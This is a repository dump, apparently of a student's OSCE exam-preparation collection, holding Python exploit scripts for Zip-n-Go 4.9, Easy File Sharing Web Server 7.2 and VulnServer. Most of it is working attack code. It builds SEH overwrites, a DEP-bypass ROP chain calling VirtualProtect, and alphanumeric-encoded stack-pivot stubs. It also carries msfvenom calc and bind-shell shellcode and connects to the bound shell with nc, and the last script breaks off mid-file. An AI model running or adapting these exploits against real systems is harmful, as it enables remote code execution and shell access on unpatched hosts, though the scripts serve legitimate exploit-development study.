Witchcraft += '\x2D\x53\x25\x22\x22'      # SUB EAX,22222553
Witchcraft += '\x50'                      # PUSH EAX
Witchcraft += '\x5C'                      # POP ESP

#https://github.com/ihack4falafel/Slink
#root@kali:/opt/Slink# python Slink.py                        * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
#Enter your shellcode: 9089FC89F8058C050000FFE0
#[+] Shellcode size is divisible by 4
#[+] Encoding [e0ff0000]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Witchcraft += "\x05\x11\x11\x77\x61" ## add  eax, 0x61771111
Witchcraft += "\x05\x11\x11\x66\x51" ## add  eax, 0x51661111
Witchcraft += "\x05\x11\x11\x55\x61" ## add  eax, 0x61551111
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Witchcraft += "\x50"                 ## push eax
#[+] Encoding [058c05f8]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Witchcraft += "\x05\x74\x13\x46\x13" ## add  eax, 0x13461374
Witchcraft += "\x05\x64\x13\x45\x13" ## add  eax, 0x13451364
Witchcraft += "\x05\x53\x12\x34\x12" ## add  eax, 0x12341253
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Witchcraft += "\x50"                 ## push eax
#[+] Encoding [89fc8990]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Witchcraft += "\x05\x41\x44\x76\x44" ## add  eax, 0x44764441
Witchcraft += "\x05\x41\x44\x65\x44" ## add  eax, 0x44654441
Witchcraft += "\x05\x41\x34\x54\x34" ## add  eax, 0x34543441
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Witchcraft += "\x50"                 ## push eax

Evil  = '\x41' * 3066                     # offset to shellcode 
Evil += shellcode                         # bind shell  
Evil += '\x43' * (716-len(shellcode))     # shellcode host
Evil += Witchcraft                        # magic! 
Evil += '\x42' * (126-len(Witchcraft))    # witchcraft host
Evil += '\x74\x80\x75\x80'                # nSEH - short jump backward (jump net)
Evil += '\x6e\x4c\x40\x00'                # SEH  - pop ecx, pop ebp, retn in zip-n-go.exe 
Evil += '\x41' * (4064-3908-4-4)
Evil += '.txt'

buffer  = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader  

try:
	f=open("Evil.zip","w")
	print "[+] Creating %s bytes evil payload.." %len(Evil)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e

================================================
FILE: Local Buffer Overflow/Zip-n-Gov4.9/README.md
================================================
### Zip-n-Go v4.9
Structured Exception Handler (SEH) overwrite exploit found while studying about ZIP file headers. See the link [EDB-ID: 44828](https://www.exploit-db.com/exploits/44828/)

<p align="center">
  <img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/Zip-n-Gov4.9/PoC.gif">
</p>


================================================
FILE: README.md
================================================
# OSCE
Some of the sploits and tools made during my joruney to take on OSCE. Mostly useless.. 


<p align="center">
  <img  height=500 width=900 src="https://media.giphy.com/media/Uno27COfoYlH2/giphy.gif">
</p>

<p align="center">
With persistence and patience comes success
</p>


================================================
FILE: Remote Buffer Overflow/EasyFileSharingWebServerv7.2/Exploit.py
================================================
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------#
# Exploit Title   : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #
# Date            : 04/24/2018                                                                      #
# Exploit Author  : Hashim Jawad                                                                    #
# Twitter         : @ihack4falafel                                                                  #
# Author Website  : ihack4falafel[.]com                                                             #
# Vendor Homepage : http://www.sharing-file.com/                                                    #
# Software Link   : http://www.sharing-file.com/efssetup.exe                                        #
# Original Exploit: https://www.exploit-db.com/exploits/44485/                                      #
# Tested on       : Windows 7 Enterprise (x86) - Service Pack 1                                     # 
#---------------------------------------------------------------------------------------------------#

import requests
import struct
import time

host='192.168.80.148'
port='80'

# badchars = "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
# Payload size: 447 bytes

shellcode =  ""
shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
shellcode += "\x70\x41\x41"

# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]
buffer  = '\x41' * (2647-128)                # filler to where ESP will point after stack pivot (see SEH gadget)

# mona.py VirtualProtect() ROP template with few modifications 

# ESI = ptr to VirtualProtect()
buffer += struct.pack('<L', 0x10015442)      # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c832d0)      # ptr to &VirtualProtect() [IAT sqlite3.dll]
buffer += struct.pack('<L', 0x1002248c)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c18d81)      # XCHG EAX,EDI # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x1001d626)      # XOR ESI,ESI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x10021a3e)      # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]

# EBP = ReturnTo (ptr to jmp esp)
buffer += struct.pack('<L', 0x1001add7)      # POP EBP # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c24169)      # & push esp # ret  [sqlite3.dll]

# EDX = NewProtect (0x40)
buffer += struct.pack('<L', 0x10022c4c)       # XOR EDX,EDX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]

# ECX = lpOldProtect (ptr to W address)
buffer += struct.pack('<L', 0x1001b377)      # POP ECX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad)      # &Writable location [sqlite3.dll]

# EBX = dwSize (0x00000501)
buffer += struct.pack('<L', 0x10015442)	     # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0xfffffaff)      # will become 0x00000501 after negate
buffer += struct.pack('<L', 0x100231d1)	     # NEG EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001da09)      # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858)      # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858)      # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x10015442)	     # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad)      # &Writable location [sqlite3.dll]

# EDI = ROP NOP (RETN)
buffer += struct.pack('<L', 0x10019f47)      # POP EDI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858)      # RETN (ROP NOP) [ImageLoad.dll]

# EAX = NOP (0x90909090)
buffer += struct.pack('<L', 0x10015442)      # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x90909090)      # nop
buffer += struct.pack('<L', 0x100240c2)      # PUSHAD # RETN [ImageLoad.dll]

buffer += "\x90" * 50                        # nop
buffer += shellcode                          # calc.exe
buffer += "\x90" * 50                        # nop

buffer += '\x45' * (1412-(4*88)+128-len(shellcode)-100) 
buffer += '\x42' * 4                         # nSEH filler

# stack pivot that will land somewhere in buffer of As
buffer += struct.pack('<L', 0x10022869)      # SEH ADD ESP,1004 # RETN [ImageLoad.dll]

buffer += '\x44' * (5000-4059-4-4)

print "[+] Sending %s bytes of evil payload.." %len(buffer)
time.sleep(1)

try:
	cookies = dict(SESSIONID='6771', UserID=buffer,PassWD='')
	data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
	requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)
except:
	print "The server stopped responding. You should see calc.exe by now ;D"


================================================
FILE: Remote Buffer Overflow/EasyFileSharingWebServerv7.2/readme.md
================================================
### Easy File Sharing Web Server v7.2
Remote SEH based Buffer Overflow exploit with DEP bypass (ROP gadgets) using VirtualProtect() API. See the sploit on exploit-db [EDB-ID: 44522](https://www.exploit-db.com/exploits/44522/)

![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/EasyFileSharingWebServerv7.2/PoC.PNG)


================================================
FILE: Remote Buffer Overflow/VulnServer/Bad Characters/Exploit.py
================================================
import time
import socket
import subprocess

'''
Notes:
======
- Bad characters are everything beyond '\x7f' and obviously '\x00'
- Bad character '\xff' get converted to '\x80' by vulnserver, which will use for the backward jump ;)
- Manual shellcoding is required to jump to the start of shellcode
- Used Slink alphanumeric encoder found in https://github.com/ihack4falafel/Slink, whomever made this tool must be 1337 ;)
'''

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00' -e x86/alpha_mixed BufferRegister=ESI -f python -v shellcode 
#Payload size: 710 bytes
shellcode =  ""
shellcode += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x68\x68\x4b\x32\x77\x70"
shellcode += "\x37\x70\x53\x30\x45\x30\x6d\x59\x59\x75\x70\x31"
shellcode += "\x79\x50\x53\x54\x6e\x6b\x72\x70\x46\x50\x4c\x4b"
shellcode += "\x30\x52\x66\x6c\x4c\x4b\x53\x62\x54\x54\x4c\x4b"
shellcode += "\x50\x72\x67\x58\x76\x6f\x58\x37\x63\x7a\x76\x46"
shellcode += "\x34\x71\x69\x6f\x4e\x4c\x67\x4c\x55\x31\x53\x4c"
shellcode += "\x56\x62\x46\x4c\x75\x70\x4f\x31\x58\x4f\x44\x4d"
shellcode += "\x46\x61\x49\x57\x6a\x42\x78\x72\x33\x62\x72\x77"
shellcode += "\x4e\x6b\x73\x62\x34\x50\x4e\x6b\x43\x7a\x77\x4c"
shellcode += "\x4c\x4b\x32\x6c\x74\x51\x53\x48\x59\x73\x30\x48"
shellcode += "\x63\x31\x4b\x61\x52\x71\x4c\x4b\x50\x59\x61\x30"
shellcode += "\x66\x61\x7a\x73\x6c\x4b\x50\x49\x65\x48\x38\x63"
shellcode += "\x57\x4a\x63\x79\x4e\x6b\x64\x74\x6e\x6b\x73\x31"
shellcode += "\x68\x56\x45\x61\x49\x6f\x6c\x6c\x5a\x61\x78\x4f"
shellcode += "\x46\x6d\x37\x71\x69\x57\x75\x68\x4d\x30\x63\x45"
shellcode += "\x69\x66\x33\x33\x31\x6d\x49\x68\x67\x4b\x43\x4d"
shellcode += "\x35\x74\x44\x35\x48\x64\x52\x78\x6c\x4b\x56\x38"
shellcode += "\x34\x64\x57\x71\x4e\x33\x65\x36\x6e\x6b\x36\x6c"
shellcode += "\x32\x6b\x6c\x4b\x70\x58\x35\x4c\x53\x31\x5a\x73"
shellcode += "\x6e\x6b\x46\x64\x4c\x4b\x63\x31\x4a\x70\x4f\x79"
shellcode += "\x70\x44\x66\x44\x55\x74\x43\x6b\x43\x6b\x53\x51"
shellcode += "\x31\x49\x31\x4a\x50\x51\x39\x6f\x79\x70\x73\x6f"
shellcode += "\x53\x6f\x62\x7a\x6e\x6b\x32\x32\x48\x6b\x6c\x4d"
shellcode += "\x31\x4d\x50\x68\x76\x53\x57\x42\x63\x30\x63\x30"
shellcode += "\x32\x48\x71\x67\x62\x53\x67\x42\x63\x6f\x32\x74"
shellcode += "\x35\x38\x42\x6c\x52\x57\x64\x66\x34\x47\x79\x6f"
shellcode += "\x38\x55\x58\x38\x6c\x50\x36\x61\x53\x30\x55\x50"
shellcode += "\x66\x49\x58\x44\x32\x74\x36\x30\x55\x38\x35\x79"
shellcode += "\x4d\x50\x42\x4b\x37\x70\x69\x6f\x49\x45\x61\x7a"
shellcode += "\x64\x48\x56\x39\x66\x30\x59\x72\x69\x6d\x71\x50"
shellcode += "\x30\x50\x37\x30\x46\x30\x35\x38\x4b\x5a\x54\x4f"
shellcode += "\x59\x4f\x49\x70\x59\x6f\x7a\x75\x4d\x47\x73\x58"
shellcode += "\x54\x42\x67\x70\x32\x31\x71\x4c\x6c\x49\x79\x76"
shellcode += "\x52\x4a\x44\x50\x32\x76\x72\x77\x72\x48\x59\x52"
shellcode += "\x69\x4b\x67\x47\x31\x77\x39\x6f\x59\x45\x30\x57"
shellcode += "\x73\x58\x78\x37\x6a\x49\x54\x78\x69\x6f\x59\x6f"
shellcode += "\x68\x55\x32\x77\x70\x68\x53\x44\x4a\x4c\x57\x4b"
shellcode += "\x68\x61\x4b\x4f\x4e\x35\x33\x67\x4a\x37\x63\x58"
shellcode += "\x50\x75\x52\x4e\x62\x6d\x51\x71\x79\x6f\x6e\x35"
shellcode += "\x53\x58\x50\x63\x62\x4d\x63\x54\x73\x30\x4f\x79"
shellcode += "\x69\x73\x31\x47\x43\x67\x52\x77\x36\x51\x48\x76"
shellcode += "\x43\x5a\x56\x72\x51\x49\x31\x46\x7a\x42\x6b\x4d"
shellcode += "\x30\x66\x6f\x37\x73\x74\x74\x64\x77\x4c\x56\x61"
shellcode += "\x47\x71\x4e\x6d\x62\x64\x76\x44\x44\x50\x79\x56"
shellcode += "\x63\x30\x32\x64\x61\x44\x42\x70\x66\x36\x31\x46"
shellcode += "\x36\x36\x42\x66\x30\x56\x30\x4e\x70\x56\x53\x66"
shellcode += "\x63\x63\x62\x76\x42\x48\x62\x59\x38\x4c\x67\x4f"
shellcode += "\x6d\x56\x39\x6f\x6a\x75\x6d\x59\x59\x70\x42\x6e"
shellcode += "\x71\x46\x30\x46\x4b\x4f\x34\x70\x75\x38\x76\x68"
shellcode += "\x4c\x47\x67\x6d\x53\x50\x4b\x4f\x7a\x75\x6d\x6b"
shellcode += "\x58\x70\x38\x35\x4d\x72\x43\x66\x35\x38\x6c\x66"
shellcode += "\x6a\x35\x4f\x4d\x4d\x4d\x6b\x4f\x79\x45\x77\x4c"
shellcode += "\x43\x36\x63\x4c\x46\x6a\x4f\x70\x69\x6b\x4d\x30"
shellcode += "\x71\x65\x54\x45\x4f\x4b\x73\x77\x47\x63\x51\x62"
shellcode += "\x70\x6f\x30\x6a\x33\x30\x66\x33\x69\x6f\x39\x45"
shellcode += "\x41\x41"

buffer  = 'LTER /.:/'
buffer += shellcode
buffer += '\x41' * (3495-124-len(shellcode))
buffer += '\x54'                          # PUSH ESP                     * point esp to where we want the encoder to dump otherwise bad shellcode
buffer += '\x58'                          # POP EAX
buffer += '\x05\x55\x11\x11\x11'          # ADD EAX,11111155
buffer += '\x05\x55\x11\x11\x11'          # ADD EAX,11111155
buffer += '\x2D\x25\x11\x22\x22'          # SUB EAX,22221125
buffer += '\x54'                          # PUSH ESP                     * save esp to esi before encoder alignement 
buffer += '\x5E'                          # POP ESI
buffer += '\x50'                          # PUSH EAX
buffer += '\x5c'                          # pop esp                      
buffer += "\x25\x4A\x4D\x4E\x55"          ## and  eax, 0x554e4d4a        * after the encoder is done we will end up with the following code
buffer += "\x25\x35\x32\x31\x2A"          ## and  eax, 0x2a313235          8BE6             MOV ESP,ESI   # restore ESP
buffer += "\x05\x77\x63\x41\x41"          ## add  eax, 0x41416377          81C6 E5030000    ADD ESI,3E5   # add offset to shellcode form ESP to ESI
buffer += "\x05\x66\x53\x41\x41"          ## add  eax, 0x41415366          FFE6             JMP ESI       # jump to ESI
buffer += "\x05\x55\x63\x41\x41"          ## add  eax, 0x41416355
buffer += "\x2D\x33\x33\x33\x33"          ## sub  eax, 0x33333333
buffer += "\x50"                          ## push eax
buffer += "\x25\x4A\x4D\x4E\x55"          ## and  eax, 0x554e4d4a
buffer += "\x25\x35\x32\x31\x2A"          ## and  eax, 0x2a313235
buffer += "\x05\x63\x12\x11\x11"          ## add  eax, 0x11111263
buffer += "\x05\x53\x12\x11\x11"          ## add  eax, 0x11111253
buffer += "\x05\x62\x12\x11\x11"          ## add  eax, 0x11111262
buffer += "\x2D\x33\x33\x33\x33"          ## sub  eax, 0x33333333
buffer += "\x50"                          ## push eax
buffer += "\x25\x4A\x4D\x4E\x55"          ## and  eax, 0x554e4d4a
buffer += "\x25\x35\x32\x31\x2A"          ## and  eax, 0x2a313235
buffer += "\x05\x46\x73\x41\x63"          ## add  eax, 0x63417346
buffer += "\x05\x45\x73\x40\x63"          ## add  eax, 0x63407345
buffer += "\x50"                          ## push eax
buffer += '\x41' * (124-73-31)            # backward jump buffer space
buffer += '\x75\xff\x74\xff'              # nSEH | jump backwards (always true)
buffer += '\x2b\x17\x50\x62'              # SEH  | 6250172B pop,pop,retn - clean address
buffer += '\x41' * (5000-9-3495-4-4)      # junk

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.0.15', 9999))
	print '[+] Sending %s bytes of evil buffer..' %len(buffer)
	s.send(buffer)
	time.sleep(5)
	subprocess.call(['nc -nv 192.168.0.15 4444'], shell=True)
except Exception as e:
	print e


================================================
FILE: Remote Buffer Overflow/VulnServer/Bad Characters/README.md
================================================
Structured Exception Handler overwrite with limited character set and small buffer size.

<p align="center">
  <img src="https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/Bad%20Characters/PoC.gif">
</p>


================================================
FILE: Remote Buffer Overflow/VulnServer/CALL [REG]/Exploit.py
================================================
#!/usr/share/python

import struct
import time
import socket
from pwn import *

def BufferOverflow():

	# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
	shellcode  = ""
	shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
	shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
	shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
	shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
	shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
	shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
	shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
	shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
	shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
	shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
	shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
	shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
	shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
	shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"

	#----------------------------#
	#           Payload          #
	#----------------------------#
	# buffer = CMD + AAA padding # |---------------------------------------------------------+
	# buffer = EIP overwrite     # |-------| WinXP SP3 Pro : "\xFF\xE4" | [essfunc.dll] |----|-+
